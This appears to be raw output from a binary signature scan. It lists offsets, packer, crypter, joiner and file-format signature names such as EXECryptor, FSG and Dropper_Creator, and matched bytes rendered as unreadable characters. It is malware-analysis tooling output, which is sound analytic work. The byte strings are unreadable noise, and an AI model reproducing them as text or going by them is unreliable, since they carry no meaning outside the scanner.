0 0x172730 ASProtect_v1_23_RC4_build_08_07_exe_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P#PPEN[t #t53VjVuN^u$3ҋEAtRRu5ЋE5t hju5U=[ aujX 3@ None $1
0 0x189e7b ASProtect_v_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P None $1
0 0x180d2a ASYLUM_Music_File_v_1_0_Detecton_1 ASYLUM Music Format V1.0 None $1
0 0x18e16e Audio_CD_file_Detecton_1 RIFFCDDAfmt None $1
0 0x180ccf AutoDesk_Animation_file_Detecton_1 @ None $1
0 0x7d230 AVI_movie_file_Detecton_1 RIFF AVI LIST None $1
0 0x171fd0 AVI_movie_file_Detecton_1 RIFFAVILIST None $1
0 0x175d6c AVP_Antiviral_Database_Detecton_1 AVP Antiviral Database None $1
0 0x18977a AVP_Inspector_Database_Detecton_1 Ghost Buster None $1
0 0x1617c0 AZProtect_0001_Detecton_Number_3 3I33۬2ֶ͊ffs f5 fu33OuыfUSV33ۋM UuNJr3CC31$*Ĉ1^[ None $1
1 0x16b3fb 0x184ba2 BamBam_0_01_Detecton_1 jShlS=+f/+ωE kfUA<3 None $1
0 0x184ba2 BamBam_v0_01_Detecton_1 jShlS=+f/+ωE kfUA<3fHfP\A9EE}:u tVO:uu3uECCPMɋKEEta5k{ + None $1
0 0x1808ce BDC_HelpSystem_Help_file_Detecton_1 BDC HelpSystem None $1
0 0x16c8ed BeRoEXEPacker_V1_00_Detecton_1 FtQ‹~ uRWP_Zt/ȋt"rDQRWPQ_ZYt ؃a None $1
0 0x177ea0 BeRoEXEPacker_v1_00_Detecton_1 `hhhG,s)> None $1
0 0x16c8ed BeRoEXEPacker_V1_00_Detecton_Number_2 FtQ‹~ uRWP_Zt/ȋt"rDQRWPQ_ZYt None $1
0 0x182209 BGI_Stroked_Font_v_1_1_Detecton_1 PKBGI Stroked Font V1.1 None $1
3 0x185d36 0x188a70 0x188ac0 0x18e9a5 Borland_C_Borland_Builder_Detecton_1 ;v+Y None $1
3 0x155f2a 0x156187 0x15b206 0x192d37 Borland_C_DLL_Detecton_1 fb:C++HOOK None $1
3 0x155f2a 0x156187 0x15b206 0x192d37 Borland_C_for_Win32_1999_Detecton_1 fb:C++HOOK None $1
0 0x172cfe Borland_Delphi_3_Detecton_1 Portions Copyright (c) 1983,96 Borland None $1
0 0x174b0a Borland_Delphi_3_Detecton_Number_2 Portions Copyright (c) 1983,97 Borland None $1
0 0x186b25 Borland_Delphi_5_Detecton_1 Portions Copyright (c) 1983,99 Borland None $1
0 0x160ca9 Borland_Delphi_v6_0_v7_0_Detecton_Number_2 S3j33 None $1
0 0x162111 Borland_Delphi_v6_0_v7_0_Detecton_Number_2 S3 j 3 3 None $1
0 0x166e50 Borland_Delphi_v6_0_v7_0_Detecton_Number_3 Ut< None $1
0 0x17a70e Borland_Delphi_v6_0_v7_0_Detecton_Number_3 U None $1
0 0x18a6ea Borland_Delphi_v6_0_v7_0_Detecton_Number_3 U@ None $1
0 0x174b49 CALS_Raster_graphics_format_Detecton_1 srcdocid: None $1
0 0x157ea7 Celsius_Crypt_2_1_Detecton_Number_2 U(E$?HEE HEED$E$EEEEEE;Es9}t3ED$E$ EU:EEE뿃}t4}t.ED$E$EU:EED$E$EU: EEEEEE None $1
0 0x1845e3 CGM_Graphics_format_Detecton_1 *HiJaak 2 None $1
0 0x16729c ChinaProtect_Detecton_1 0ù0ù0ù0Vj@hPj0^ËDVh@6VhjV^ None $1
1 0x16345c 0x196b61 CICompress_1_0_Detecton_1 jh5@j8@@ @q;@uajj jjjhh@,@@jh@5 None $1
1 0x16373b 0x174a0b CipherWall_Self_Extrator_Decryptor_Console_1_5_Detecton_1 aBLJ  n[WFGu ru su s None $1
1 0x16e82a 0x1897a6 CipherWall_Self_Extrator_Decryptor_GUI_1_5_Detecton_1 aBLJ jWFGu ru su s None $1
0 0x15edb5 Code_Virtualizer_V1_3_1_0_Detecton_1 `_ǁ;G,u.G,DI u@tw@ >ut$$3O0u None $1
0 0x16f92b codeCrypter_0_31_Detecton_Number_2 PXS[@U] None $1
0 0x179051 CorelDraw_8_CDR_Graphics_format_Detecton_1 RIFFCDR8 None $1
0 0x17e56f CorelDraw_CMX_Graphics_format_Detecton_1 RIFFCMX1 None $1
1 0x1580a5 0x1880aa CreateInstall_2003_3_5_Detecton_1 SVWUh`P@jj؀@Ԁ@=uV@j@3h t@S t@@ None $1
0 0x1880aa CreateInstall_v2003_3_5_Detecton_1 SVWUh`P@jj؀@Ԁ@=uV@j@3h t@S t@@P@ P@h@ D$Zh-Ѐ@D$ D$ PSՍL$ Sh=̀@jSjhQ׋SD$ P@T$PQRVȀ@@P@;T$0jP@+ЋL$;P@V None $1
0 0x187572 Creative_Audio_file_Detecton_1 Creative Voice File None $1
1 0x15d86c 0x16335d Crunch_4_0_Detecton_1 U]U`+t$,Ihlٲ3P$ None $1
1 0x163831 0x19140b Crunch_5_Detecton_1 hU] U`+t$, I None $1
2 0x1601c3 0x163831 0x19140b Crunch_5_Fusion_4_Detecton_2 hU None $1
1 0x15d86c 0x16335d Crunch_PE_4_0_Detecton_1 U]U`+t$,Ihlٲ3P$ None $1
0 0x16335d Crunch_PE_v4_0_Detecton_1 U]U`+t$,Ihlٲ3P$AhI{y3PAgVQRS3I33۬2ֶ͊ffs f5 fu33Ou[fZYhD$ȋ%3 ‹%33333 ‹%UUUU3 None $1
0 0x168097 Crypto_Lock_2_02_Eng_Detecton_1 `@WFGu ru su s1Ƀr None $1
0 0x15a24d D1NS1G_Detecton_1 7 78P7h7x`DVCLAL PACKAGEINFO None $1
0 0x15f134 D1S1G_v1_1_Beta_Scrambled_EXE_Detecton_1  ÐX‰%PU0@0RÍ@USVWMEEE EAa8AeljEAiǍQm׃q +r Aр1AJuEq None $1
0 0x16ee3b D1S1G_v1_1_beta_Detecton_1  8PhxDVCLAL PACKAGEINFO None $1
1 0x156e39 0x18aca1 DEF_1_00_Eng_Detecton_1 @jY~tF @V0@Ju(h@ None $1
0 0x168b86 DEF_v1_0_Detecton_Number_2 @jY~tF @V0@Ju(h@ None $1
0 0x166a6e Dev_C_v4_Detecton_1 Uj None $1
0 0x166a85 Dev_C_v5_Detecton_1 Uj None $1
0 0x175637 DiskDupe_c_MSD_Configuration_file_Detecton_1 MSD Data Vers None $1
0 0x18533a DiskDupe_c_MSD_Users_file_Detecton_1 MSD Users Version None $1
0 0x1660bf DotFix_Nice_Protect_V2_1_Detecton_1 `t$$|$(3ۤms3ds 3[s#AOsu?M+uB(tM H,=}s swAAųV+^uF3Ar+|$(|$ a`P݃ SPj@ht$,jЉD$ a None $1
0 0x157023 Dropper_Creator_V0_1_Detecton_1 `])ō1d@0x @ p @ None $1
0 0x1570c7 dUP_2_x_Patcher_Detecton_1 ˅t:tu BIGFBI None $1
2 0x4e 0x113cf3 0x12ac4a dUP_v2_x_Patcher_Detecton_1 This program cannot be run in DOS mo None $1
1 0x16a8ae 0x1771d4 DzA_Patcher_1_3_Loader_Detecton_1 @@hH @h @RRRRRRRWu RRWR5L @jhX @RRhc@RRj5 None $1
0 0x1771d4 DzA_Patcher_v1_3_Loader_Detecton_1 @@hH @h @RRRRRRRWu RRWR5L @jhX @RRhc@RRj5H @@@@5L @t`jjjQ5H @ua`\ @jjSQ5H @ua\ @_:t5L @KjJ`_jjSQ5H @Ka5L @ j r%p0@%x None $1
0 0x167485 Elicense_System_V4_0_0_0_Detecton_1 cybelicen40.dll None $1
0 0x1536d6 EmbedPE_V1_00_V1_24_Detecton_1 KERNEL32.dllGetProcAddressGetModuleHandleALoadLibraryA None $1
0 0x1788f5 Encapsulated_Postscript_graphics_file_v2_0_EPSF_1_2_Detecton_1 %!PS-Adobe-2.0 EPSF-1.2 None $1
0 0x179ffd Encapsulated_Postscript_graphics_file_v3_0_EPSF_3_0_Detecton_1 %!PS-Adobe-3.0 EPSF-3.0 None $1
0 0x17c5a7 Encrypted_by_RSCC_286_v1_01_Detecton_1 RSCC/1.01 None $1
0 0x18abf4 Encrypted_by_RSCC_286_v1_02_Detecton_1 RSCC/1.02 None $1
0 0x154af4 EncryptPE_V2_2006_1_15_Detecton_1 EPE: EncryptPE V2.2006.1.15 None $1
1 0x15e082 0x163d6f EncryptPE_V2_2006_7_10_Detecton_1 `d5s None $1
1 0x159574 0x1595c9 Enigma_protector_1_10_unregistered_Detecton_1 `rrrrrrrrrY\9991\=X_V- z.02r+r6 3Ŝɜ͜ќ՜ٜݜ None $1
0 0x1595c9 Enigma_protector_1_10_unregistered_Detecton_Number_2 `rrrrrrrrrY\9991\=X_V- z.02r+r6 3Ŝɜ͜ќ՜ٜݜQ Ā~5 7=EMt$k>8 I'Q:Ȯ; 5 None $1
0 0x152d8d Enigma_Protector_1_X_Detecton_Number_2 VirtualAllocVirtualFreeGetModuleHandleAGetProcAddressExitProcessLoadLibraryAMessageBoxARegCloseKeySysFreeStringCreateFontAShellExecuteA None $1
0 0x15ce6c ENIGMA_Protector_V1_X_Detecton_1 Enigma protector v1 None $1
1 0x16ede6 0x17a77c EP_1_0_Detecton_1 P33ɱ$ĬĪ@<@3fPp4DHp 30000BB_^ None $1
0 0x17bc24 Erdas_LAN_GIS_Image_graphics_format_Detecton_1 HEAD74 None $1
0 0x16fcb0 Escargot_0_1_Detecton_Number_2 (esc0.1)`h+d5d%\PI41@ uX t3 F PPT_?tG3 uV׋  tKtPQPP None $1
1 0x15a999 0x1718be eXcalibur_v1_03_Detecton_1 `]jEhXa9 Excalibur (c) by forgot/uS/DFCG None $1
1 0x159c60 0x17e099 Exe_Guarder_1_8_Detecton_1 USVWuD$0%8MZt-E-E@<@xȋQ Y$ ]Y  None $1
1 0x165267 0x1652bc EXE_Shield_0_5_Detecton_1 ` ]EU]@F@ %@ XPX@ None $1
1 0x1634b1 0x180487 Exe_Shield_2_7b_Detecton_1 h@Ü`3ă[?@݋@3@fDž0@ڐ@ސ@@{@ None $1
1 0x1656c7 0x16571c EXE_Shield_V0_6_Detecton_1 ` ]EU]@^@ &@ XPX@ None $1
1 0x16b460 0x18a102 EXE_Stealth_2_5_Detecton_1 `"ExeStealth - www.webtoolmaster.com]@ @ @ None $1
1 0x16a144 0x185f66 EXE_Stealth_2_73_Detecton_1 /Shareware - ExeStealthwww.webtoolmaster.com`]'@V None $1
1 0x16a1ee 0x1866fb EXE_Stealth_2_74_Detecton_1 Shareware - ExeStealth`]'@VxC'e%c None $1
0 0x154e02 EXECryptor_2_0_2_1_protected_IAT_Detecton_1 <kernel32.dllGetModuleHandleALoadLibraryAGetProcAddressExitProcess`puser32.dllMessageBoxA None $1
0 0x177c15 EXECryptor_2_0_2_1_Detecton_1 UVWSE‹F ЉP S EjE UFE~} \Su E None $1
2 0x1678cd 0x177c1e 0x17c868 EXECryptor_2_1_17_Detecton_1 E‹F ЉP S EjE UF None $1
0 0x17c868 EXECryptor_2_1_17_Detecton_Number_2 E‹F ЉP S EjE UFE~} \Su E None $1
2 0x154e3e 0x16ab1a 0x17a36e EXECryptor_2_2_4_Detecton_Number_3 kernel32.dllGetModuleHandleALoadLibraryAGetProcAddressExitProcess None $1
0 0x160d2d EXECryptor_2_2_6_minimum_protection_Detecton_1 PhX $YE$ZWhX+ None $1
0 0x1701a9 EXECryptor_2_2_6_DLL_minimum_protection_Detecton_1 PƇ$h^3  None $1
0 0x158acc EXECryptor_2_2_x_Detecton_1  None $1
0 0x1572fa EXECryptor_2_2_2_3_compressed_code_Detecton_Number_2 X $PjhPjYRSPljX $hjPYX[C tFt8S <s% z f%ڭN%=u None $1
0 0x16f6f0 EXECryptor_2_3_9_compressed_resources_Detecton_1 QhY<˘S,`E6E  !Ub $#W, None $1
0 0x15fe21 EXECryptor_2_3_9_minimum_protection_Detecton_1 hPQj+h6Yd None $1
0 0x1661e9 EXECryptor_2_3_9_DLL_compressed_resources_Detecton_1 PhX$XEU B}4$^E3V None $1
0 0x15bf4e EXECryptor_2_3_9_DLL_minimum_protection_Detecton_1 Qh,$]EQhY $YQd0@ @ None $1
0 0x154e02 EXECryptor_2_x_Detecton_1 < None $1
0 0x15c649 EXECryptor_2_xx_compressed_resources_Detecton_1 VWS1ۉƉƒt-Jt\FF)J)2\F)J FsCtV։1^띉[_^ None $1
0 0x15c286 EXECryptor_2_xx_max_compressed_resources_Detecton_1 USWVEUƉf>JC# E1ۺC1sMEs[HtsUGMur]뢹EEtE|P None $1
0 0x15b591 EXECryptor_v1_5_3_Detecton_1 $L$ ǁ1AA1d0d None $1
0 0x156478 EXECryptor_V2_1X_Detecton_1 U None $1
0 0x168a0c EXECryptor_V2_2X_Detecton_1 ^ None $1
1 0x1553c3 0x171216 ExeSafeguard_1_0_Detecton_1 ]NGiNXYtuYߝQ"?@HGiNXYyxYQ None $1
0 0x171216 ExeSafeguard_v1_0_Detecton_1 ]NGiNXYtuYߝQ"?@HGiNXYyxYQߺ"?`MGiNXYyxYQ躣"?@GGiNXYz{YQ"?LGiNXYtuYQ躣"?+KGiNXYx None $1
0 0x1619c7 ExeSplitter_1_2_Detecton_1 d8t@UuVV^uUu v<vv`6Vv 3ҋƋ6} u None $1
0 0x162e3a ExeSplitter_1_3_Split_Method_Detecton_1 ]@fUP@S!@Sjvj@h0hj@a@Ph@e@Pa@@jhjja@@r@jP @@Pr@@r@@ @P @Pj None $1
0 0x158941 ExeSplitter_1_3_Split_Crypt_Method_Detecton_1 #VWWH fffffffffVfff&j&jfi9dff.V_ a_-djUd&~3튍i!6 ''+jneZ~Pe0FeUPe7+j߫v&f?hfffmd None $1
1 0x15314c 0x1773c0 ExeStealth_Detecton_1 XShareware-Version ExeStealth, contact support@webtoolmaster.co None $1
0 0x16c22c EXEStealth_2_76_Unregistered_Detecton_1 ExeStealth V2 Shareware None $1
0 0x1885a2 EXE_Detecton_1 SVV None $1
2 0x155879 0x1558ce 0x18c876 eXPressor_1_2_Detecton_1 USVW ExPr-v.1.2..+=tTh None $1
2 0x155879 0x1558ce 0x18c876 eXPressor_1_2_0b_Detecton_1 USVW ExPr-v.1.2..+=tTh None $1
1 0x1535c9 0x15361e eXPressor_1_4_5_1_Detecton_1 UXSVWe eXPr-v.1.4.+H =t H None $1
1 0x16d82e 0x1885b2 eXpressor_v1_0_Detecton_1 51 B None $1
4 0x15586e 0x155887 0x1558dc 0x16ff9f 0x18c884 eXPressor_v1_2_Detecton_Number_2 ExPr-v.1.2. None $1
0 0x18c876 eXPressor_v1_2_0b_Detecton_1 USVW ExPr-v.1.2..+=tThPj88\ None $1
2 0x15321e 0x153234 0x191a45 eXPressor_v1_3_Detecton_Number_2 ExPr-v.1.3. None $1
2 0x1535d9 0x15362e 0x1845a4 eXPressor_v1_4_Detecton_Number_2 eXPr-v.1.4. None $1
0 0x165040 eXPressor_Protection_1_5_0_X_Detecton_1 h SVW=tVڟhhYY None $1
0 0x165040 eXPressor_Protection_V1_5_0_X_Detecton_1 h SVW=tVڟhhYYfhY݃eE@E}asE3EM None $1
0 0x169b0f FakeNinja_v2_8_Anti_Debug_Detecton_1 d@0@td0@ttPd0hpt131+=s=t@0d򐐐d@5@@jj5p@5@% None $1
1 0x162906 0x169b90 FakeNinja_v2_8_Detecton_1 d@5@@ None $1
1 0x163469 0x196b6e FASM_1_5x_Detecton_1 j8@@ None $1
1 0x17a357 0x18534b FASM_1_5x_Detecton_1 j@@ None $1
0 0x179b10 File_Analyzer_Compiled_Datafile_Version_v3_v4_Detecton_1 File Analyzer Compiled Datafile Version None $1
0 0x179b10 File_Analyzer_Compiled_Datafile_Version_Detecton_1 File Analyzer Compiled Datafile Version None $1
0 0x17cb9e File_Analyzer_Extended_Datafile_Version_v3_v4_Detecton_1 #EXTD: None $1
0 0x17cb9e File_Analyzer_Extended_Datafile_Version_Detecton_1 #EXTD: None $1
0 0x172659 File_Analyzer_Registration_file_v1_0_Detecton_1 $FAREG$M-1 None $1
0 0x1790a3 File_Analyzer_Registration_file_v1_1_Detecton_1 $FAREG$ENC=&&REG=&&EXP= None $1
1 0x16be67 0x16db0f Fish_PE_Shield_1_01_Detecton_1 USVWE None $1
0 0x16db0f Fish_PE_Shield_1_01_Detecton_Number_2 USVWE E܃}uEU܉UUUUUUEEX]E0Nr+FE{t None $1
1 0x16be67 0x16db0f Fish_PE_Shield_1_12_1_16_Detecton_1 USVWE E None $1
0 0x16be67 Fish_PE_Shield_1_12_1_16_Detecton_Number_2 USVWE E܃}uEE܉EغN.EI2ӋETʯE3EFyE躪 |EEX]E0Nr+ None $1
1 0x15a84c 0x1757e1 FixupPak_1_20_Detecton_1 U]+Ջ3<t=<t<t<t )f<t<t f None $1
0 0x1682ce Fly_Crypter_1_0_Detecton_1 SVWU,D0DD D{(u?t3҉Ճ?u=0DDtX0DD{(u >u3C  0DD{(v>t"Ct0DDSB;Bt tP/$0DD{(uS${(t5;u=DtDPQV ^s]_^[ã0DD& None $1
0 0x181ae9 Free_Pascal_0_99_10_Detecton_1 nU} u]) None $1
1 0x1728cc 0x174b65 Free_Pascal_1_06_Detecton_1 @h None $1
0 0x174b59 Free_Pascal_1_06_Detecton_1 @t None $1
0 0x174bdc Free_Pascal_1_06_Detecton_1 @ None $1
0 0x17e6ca Free_Pascal_1_06_Detecton_1 @ None $1
0 0x172193 Free_Pascal_v1_0_10_win32_console_Detecton_1 P%U None $1
0 0x17219f Free_Pascal_v1_0_10_win32_GUI_Detecton_1 P%U None $1
0 0x164a20 FreeBASIC_0_16b_Detecton_1 U$1]ÉU$h1]ÉUE$] None $1
0 0x15439a FreeCryptor_0_1_build_001_Detecton_1 $@8th&d5d%䐋$dd$ None $1
0 0x16568f FreeCryptor_0_1_build_002_Detecton_1 $@8th'd5d%䐋$dd$ None $1
0 0x16c4e3 FreeCryptor_0_2_build_002_Detecton_1 3Ґ hPTd$XP3R@$$\$\$ utbАZ3T$dR\Z None $1
0 0x176c4a FreeJoiner_1_5_3_Stub_engine_1_7_1_Detecton_1 ֐`֐E֐“`3ɹ0tM֐3@hh@j3Ɇ֐jhjjjhh@@ None $1
0 0x18d1ba FreeJoiner_Small_build_014_015_Detecton_1 Uhh@jjhjjjhh@@@jjj5@jEPjEP5@jEPjEP None $1
0 0x175579 FreeJoiner_Small_build_017_Detecton_1 Uۆhh @jjhjjjhh @ @@jjj5 @ۆjEPjEP5 @jEPjEP None $1
0 0x174e91 FreePascal_1_0_4_Win32_Detecton_1 UU1fՉ--1] None $1
0 0x171f9c FreePascal_1_0_4_Win32_DLL_Detecton_1 USVW}=} =}=_^[] None $1
0 0x174bd9 FreePascal_2_0_0_Win32_Detecton_1 U@jd5p@U1 @fՉ-0@1r] None $1
0 0x174c63 FreePascal_2_0_0_Win32_Detecton_1 Ujd5U1fՉ-1] None $1
1 0x168224 0x18f193 FSG_1_00_Eng_Detecton_1 @@S uFj[$s3$s3$s!A$su?C+u8 None $1
1 0x168a35 0x17e1c0 FSG_1_20_Eng_Detecton_1  ƍ  Y7 * s2#[V{ None $1
1 0x15656a 0x181f5f FSG_1_20_Eng_Detecton_Number_2 5þ"hC"_3+ǀzA<Ϯƫ,2 ˁ None $1
1 0x1632f2 0x187d08 FSG_1_20_Eng_Detecton_Number_3  Zލ58L "3&Zo  None $1
1 0x15dc77 0x183cc1 FSG_1_20_Eng_Detecton_Number_4 3,=~EEXh ^@h,[Ɋ*LXS* None $1
1 0x15425a 0x175b1e FSG_1_20_Eng_Detecton_Number_5  53h~} [#hw~}_X3?X /* /R2Ӏ̀ None $1
1 0x16c2ed 0x17f89d FSG_1_20_Eng_Detecton_Number_6  '$BI \1A ꨌ4FbY2h* None $1
1 0x15b766 0x188480 FSG_1_31_Eng_Detecton_1 @@Ss3s3s#AsuBFu8(tH None $1
3 0x154190 0x176440 0x176cde 0x17dcdc FSG_1_3_Detecton_1 @@S uFòj[$s3$s3$s!A$su?C+u8 None $1
0 0x176440 FSG_v1_3_Detecton_Number_2 @@S uFòj[$s3$s3$s!A$su?C+u8(tA H"=}s swAAųV+^3AT$T$r_[;OtOt {WCCR_G7W3ut None $1
0 0x176cde FSG_v1_3_Detecton_Number_2 @@S uFòj[$s3$s3$s!A$su?C+u8(tA H"=}s swAAųV+^3AT$T$r_[;OtOt {WCCR_'G7W3ut None $1
0 0x17dcdc FSG_v1_3_Detecton_Number_2 @@S uFòj[$s3$s3$s!A$su?C+u8(tA H"=}s swAAųV+^3AT$T$r_[;OtOt {WCCR_G7W3ut None $1
0 0x16bc6e FSG_v2_0_Detecton_2 %aUs3s3sAsu None $1
1 0x165abf 0x165b14 Fuck_n_Joy_1_0c_Detecton_1 `]@t$  ,l@/@Pl@  ;@?@Pl@ None $1
1 0x1622c4 0x170169 Gleam_1_00_Detecton_1 SVW$ None $1
0 0x16ca39 GP_Install_v5_0_3_32_Detecton_1 U3QQQQQQQSVW Ak>3Uhv Ad0d GA31 3ҡ None $1
1 0x1643ec 0x16443f HASP_HL_Protection_1_X_Detecton_1 USVW`ģ+=t Qhh None $1
0 0x174b3d Histogram_graphics_file_Detecton_1 mhwanh None $1
0 0x185d40 Hitachi_Raster_Format_graphics_format_Detecton_1 CADC/KR RST None $1
1 0x15da93 0x15db8d hmimys_protect_0_1_Detecton_1 ^dPPlPPPPP None $1
1 0x15da93 0x15db8d hmimys_Packer_1_0_Detecton_1 ^dPPlPPPPP None $1
1 0x15da93 0x15db8d hmimys_Packer_1_0_Detecton_Number_2 ^dPPlPPPPP None $1
0 0x18641b HQR_data_file_Detecton_1 H None $1
0 0x17fe90 Hying_s_PE_Armor_0_75_exe_Detecton_1 VirtualAllocttKERNEL32.dllGetProcAddressGetModuleHandleALoadLibraryA`]UVU None $1
1 0x16d4b9 0x17fe90 Hying_s_PE_Armor_0_75_exe_Detecton_Number_2 VirtualAlloct None $1
1 0x1564ac 0x181b6f Hying_s_PE_Armor_0_75_exe_Detecton_Number_3 UUu None $1
0 0x17fd97 Hying_s_PE_Armor_0_76_Detecton_1 VirtualAllocVirtualFreeaYKERNEL32.dllGetProcAddressLoadLibraryAGetModuleHandleA`]UVU None $1
0 0x17e1b4 IBM_PictureMaker_graphics_file_Detecton_1  None $1
0 0x17d579 Img_Software_Set_graphics_file_Detecton_1 SCMI 1AT None $1
0 0x19070a IMP_Packer_1_0_Detecton_1 (@4L\KERNEL32.dllGetProcAddressLoadLibraryA None $1
1 0x153d83 0x19070a IMP_Packer_1_0_Detecton_Number_2 (@4L\KERNEL32.dllGetProc None $1
0 0x16f2c7 INCrypter_0_3_INinY_Detecton_Number_2 `d0@ @ X ]M@@d@0@u@@Q>.rsrte@#@ @ "@;F r t ;F4rXuN~ @t 11GY(Iu @D$ aP None $1
0 0x1771a9 Inno_Installer_v5_1_2_Detecton_1 `X +PhhPh None $1
0 0x15cfa7 Inno_Setup_Module_v2_0_18_Detecton_1 UĸSVW3EEEsqڅ聧 None $1
0 0x16a424 Inno_Setup_Module_v3_0_4_beta_v3_0_6_v3_0_7_Detecton_1 UĸSVW3EEEp%l None $1
0 0x1654a0 Inno_Setup_Module_Detecton_Number_2 USVW3EEE None $1
0 0x187698 Interchange_Format_File_IFF_type_WVQA_Detecton_1 FORMWVQAVQHD None $1
0 0x17efde Interplay_s_MVE_file_Detecton_1 Interplay MVE File None $1
1 0x16bae8 0x196a62 iPBProtect_0_1_3_Detecton_1 UjhKCUFhTIHSdPd%hSVWe3ۉ]jX_^[d%dXXX]hoVP]qx None $1
0 0x196a62 iPBProtect_v0_1_3_Detecton_1 UjhKCUFhTIHSdPd%hSVWe3ۉ]jX_^[d%dXXX]hoVP]qxP[h\$H\$X\$X[LuZqxu RJqu\$3PSu $$X0qpqpqpqpqp None $1
0 0x1873d2 JAR_Archive_Detecton_1 ruJar None $1
0 0x18d681 JAR_Archive_Detecton_1 Jar None $1
0 0x15b129 KBys_Packer_0_28_Beta_Detecton_1 `^ ‹NVR‹jWWjSZYUjPQRPPjWPjS None $1
0 0x18a424 Kbys_Packer_0_28_Beta_Detecton_1 h`t$$|$(3ۤms3ds 3[s#AO None $1
0 0x15e3f5 kkrunchy_v0_17_Detecton_1 M1ҍ}0 None $1
0 0x15bc94 LamCrypt_1_0_Detecton_1 `f@Kufa None $1
1 0x1645c9 0x1869b2 LaunchAnywhere_4_0_0_1_Detecton_1 USHUPPh>Bd5d%hiDYN) ujn+Y,#.LD None $1
1 0x15f4e2 0x180bd0 Launcher_Generator_1_03_Detecton_1 h @h @jjj jjjh"@j~;h @tjh`#@h #@jX @;l @ None $1
0 0x180bd0 Launcher_Generator_v1_03_Detecton_1 h @h @jjj jjjh"@j~;h @tjh`#@h #@jX @;l @tQ\ @p!@Ëh` @S!@\ @؋p @Pp"@\ @05 @&X @@X @j%\0@%`0@%d0@%h0@%l0@%t0@ None $1
0 0x177aed Lotus_Word_Pro_document_file_Detecton_1 WordProLWP7 None $1
1 0x158f53 0x173d66 LY_WGKX_Detecton_1 MyFunbs None $1
1 0x164329 0x185ecc Macromedia_Windows_Flash_Projector_Player_5_0_Detecton_1 DVpaD<"u FF<"t tFF<"u>"uF < ~FF< t < FFuD$D$0 None $1
0 0x155cbb MarjinZ_EXE_Scrambler_SE_Detecton_1 5% jh!5|35 YEu u YajYe5|3։E5x3։EEPEPuEu5t ֣|3uփ x3E E None $1
0 0x162063 MaskPE_1_6_Detecton_1 6,$` None $1
0 0x1671bd MaskPE_V2_0_Detecton_1 d0@>6$ None $1
0 0x182b9e MASM_TASM_Detecton_Number_2 j@ None $1
0 0x19198b MASM_TASM_Detecton_Number_3 j2@ None $1
0 0x5deb MASM_TASM_sig1_h_Detecton_1 %%%%%%%% %%% None $1
0 0x5889d MASM_TASM_sig1_h_Detecton_1 %k%k%k%k%k%k%k%k%k%k%k None $1
4 0x153c91 0x15514a 0x165c76 0x16666e 0x166dd9 MASM_TASM_sig1_h_Detecton_1 %x@%|@%@%@%@%@%@%@%@%@%@ None $1
0 0x154b96 MASM_TASM_sig1_h_Detecton_1 %@%@%@%@%@%@%@%@%@%@%@ None $1
0 0x1637c8 MASM_TASM_sig1_h_Detecton_1 %%%%%%%%%%% None $1
0 0x18dc58 MASM_TASM_sig1_h_Detecton_1 %@@%@@%@@%@@%@@%@@%@@%@@%$@@%(@@%,@@ None $1
0 0x17c633 MASM_TASM_sig2_h_Detecton_1 %%%%%%%%% None $1
0 0x171cae MASM_TASM_sig4_h_Detecton_1 %%%%%%%%%%% None $1
0 0x5dec MASM_TASM_sig4_h_Detecton_Number_2 %%%%%%%% %%% None $1
23 0x5889e 0x588a4 0x588aa 0x588b0 0x588b6 0x588bc 0x588c2 0x588c8 0x588ce 0x588d4 0x588da 0x588e0 0x588e6 0x588ec 0x588f2 0x588f8 0x588fe 0x58904 0x5890a 0x58910 0x58916 0x5891c 0x58922 0x58928 MASM_TASM_sig4_h_Detecton_Number_2 %k%k%k%k%k%k%k%k%k%k%k None $1
0 0x5892e MASM_TASM_sig4_h_Detecton_Number_2 %k%k%k%k%k%k%k%k%k%k%l None $1
0 0x58934 MASM_TASM_sig4_h_Detecton_Number_2 %k%k%k%k%k%k%k%k%k%l%l None $1
0 0x5893a MASM_TASM_sig4_h_Detecton_Number_2 %k%k%k%k%k%k%k%k%l%l%l None $1
0 0x58940 MASM_TASM_sig4_h_Detecton_Number_2 %k%k%k%k%k%k%k%l%l%l%l None $1
0 0x58946 MASM_TASM_sig4_h_Detecton_Number_2 %k%k%k%k%k%k%l%l%l%l%l None $1
0 0x5894c MASM_TASM_sig4_h_Detecton_Number_2 %k%k%k%k%k%l%l%l%l%l% l None $1
0 0x58952 MASM_TASM_sig4_h_Detecton_Number_2 %k%k%k%k%l%l%l%l%l% l% l None $1
0 0x58958 MASM_TASM_sig4_h_Detecton_Number_2 %k%k%k%l%l%l%l%l% l% l%l None $1
0 0x5895e MASM_TASM_sig4_h_Detecton_Number_2 %k%k%l%l%l%l%l% l% l%l%l None $1
0 0x58964 MASM_TASM_sig4_h_Detecton_Number_2 %k%l%l%l%l%l% l% l%l%l%l None $1
0 0x5896a MASM_TASM_sig4_h_Detecton_Number_2 %l%l%l%l%l% l% l%l%l%l%l None $1
0 0x58970 MASM_TASM_sig4_h_Detecton_Number_2 %l%l%l%l% l% l%l%l%l%l%l None $1
0 0x58976 MASM_TASM_sig4_h_Detecton_Number_2 %l%l%l% l% l%l%l%l%l%l%l None $1
0 0x5897c MASM_TASM_sig4_h_Detecton_Number_2 %l%l% l% l%l%l%l%l%l%l%l None $1
0 0x58982 MASM_TASM_sig4_h_Detecton_Number_2 %l% l% l%l%l%l%l%l%l%l% l None $1
0 0x58988 MASM_TASM_sig4_h_Detecton_Number_2 % l% l%l%l%l%l%l%l%l% l% l None $1
0 0x5898e MASM_TASM_sig4_h_Detecton_Number_2 % l%l%l%l%l%l%l%l% l% l% l None $1
0 0x58994 MASM_TASM_sig4_h_Detecton_Number_2 %l%l%l%l%l%l%l% l% l% l%"l None $1
0 0x5899a MASM_TASM_sig4_h_Detecton_Number_2 %l%l%l%l%l%l% l% l% l%"l%$l None $1
0 0x589a0 MASM_TASM_sig4_h_Detecton_Number_2 %l%l%l%l%l% l% l% l%"l%$l%&l None $1
0 0x589a6 MASM_TASM_sig4_h_Detecton_Number_2 %l%l%l%l% l% l% l%"l%$l%&l%(l None $1
0 0x589ac MASM_TASM_sig4_h_Detecton_Number_2 %l%l%l% l% l% l%"l%$l%&l%(l%*l None $1
0 0x589b2 MASM_TASM_sig4_h_Detecton_Number_2 %l%l% l% l% l%"l%$l%&l%(l%*l%,l None $1
0 0x589b8 MASM_TASM_sig4_h_Detecton_Number_2 %l% l% l% l%"l%$l%&l%(l%*l%,l%.l None $1
